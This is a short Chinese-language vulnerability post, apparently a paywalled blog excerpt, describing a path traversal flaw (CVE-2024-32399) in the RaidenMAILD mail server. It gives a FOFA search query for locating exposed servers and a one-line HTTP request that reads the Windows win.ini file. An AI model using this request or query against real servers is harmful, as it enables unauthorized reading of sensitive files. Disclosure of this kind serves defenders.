超级会员免费看
本文介绍了RaidenMAILD电子邮件服务器存在的路径遍历漏洞(CVE-2024-32399),该漏洞允许未授权攻击者读取服务器任意文件,从而威胁服务器的安全。内容包括漏洞概述、影响范围及复现过程。
0x01 产品简介
RaidenMAILD是一款功能丰富且易于使用的电子邮件服务器软件,适合各种规模的机构和个人使用。
0x02 漏洞概述
RaidenMAILD 邮件服务器存在路径遍历漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件,从而获取服务器敏感信息。
0x03 测绘语句
fofa: body="RaidenMAILD"0x04 漏洞复现
GET /webeditor/../../../windows/win.ini HTTP/1.1
0x05 影响范围
RaidenMAILD Mail Server v.4.9.4
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
